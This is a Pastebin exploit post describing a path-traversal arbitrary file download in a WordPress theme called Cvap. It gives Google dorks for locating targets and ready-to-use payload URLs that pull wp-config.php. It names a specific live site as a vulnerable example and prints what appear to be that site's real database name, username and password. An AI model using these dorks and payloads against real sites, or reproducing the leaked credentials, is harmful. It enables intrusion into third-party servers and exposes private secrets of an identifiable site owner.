Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : WordPress 4.3.1 Cvap Themes Canada Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/03/2019
- # Vendor Homepage : cvap.quebec - unikmedia.ca
- # Software Information Link :
- unikmedia.ca/services-creation-site-web-quebec/creation-site-web/
- # Software Affected Version : 4.3.1
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/wp-content/themes/cvap/"
- intext:© CVAP 2015 - Création site web Québec Unik Media
- # Vulnerability Type :
- CWE-200 [ Information Exposure ]
- CWE-23 [ Relative Path Traversal ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Impact :
- ***********
- * WordPress 4.3.1 Cvap Canada Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
- fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
- web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
- of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
- vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
- properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
- ############################################################################################
- # Vulnerable File :
- ****************
- /downloadfile.php
- # Vulnerable Parameter :
- ***********************
- ?file=
- # Arbitrary File Download Exploit :
- *******************************
- /wp-content/themes/cvap/downloadfile.php?file=[FILENAME]
- /wp-content/themes/cvap/downloadfile.php?file=../../../wp-config.php
- # Information about MySQL Configuration File :
- ******************************************
- ** //
- /** Nom de la base de données de WordPress.
- */
- define('DB_NAME', '');
- /
- ** Utilisateur de la base de données MySQL.
- */
- define('DB_USER', '');
- /
- ** Mot de passe de la base de données MySQL.
- */
- define('DB_PASSWORD', '');
- /
- ** Adresse de l'hébergement MySQL.
- */
- define('DB_HOST', '');
- /
- ############################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] cvap.quebec/wp-content/themes/cvap/downloadfile.php?file=../../../wp-config.php
- ** //
- /** Nom de la base de données de WordPress.
- */
- define('DB_NAME', 'cvap_wpdatabase');
- /
- ** Utilisateur de la base de données MySQL.
- */
- define('DB_USER', 'cvap_wpbduser');
- /
- ** Mot de passe de la base de données MySQL.
- */
- define('DB_PASSWORD', 'FZc3anVHs6sWfRo');
- /
- ** Adresse de l'hébergement MySQL.
- */
- define('DB_HOST', 'localhost');
- /
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Add Comment
Please, Sign In to add comment